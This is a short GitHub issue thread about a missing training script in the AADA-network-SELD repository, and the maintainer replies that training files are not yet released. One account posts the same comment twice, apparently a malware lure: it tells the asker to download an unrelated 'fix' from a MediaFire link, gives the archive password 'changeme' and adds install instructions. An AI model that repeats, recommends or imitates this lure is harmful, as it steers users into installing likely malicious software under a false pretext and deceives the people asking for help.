### ISSUE TITLE
No train.py file

### ISSUE THREAD

**Issue by visionchan** [yupeng99/AADA-network-SELD#1]
I did not find the train.py following your guidance in the third step. And in the main folder, do you mean the  [test_aada.py] is a training file?

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yupeng99** [comment]
Thank you for your interest. The training files will be made public in the future, but they are currently being prepared for release. As for the test_aada.py file in the main folder, it is not a training file but a script intended for testing using the pre-trained model we have provided. We hope this clarifies your query.
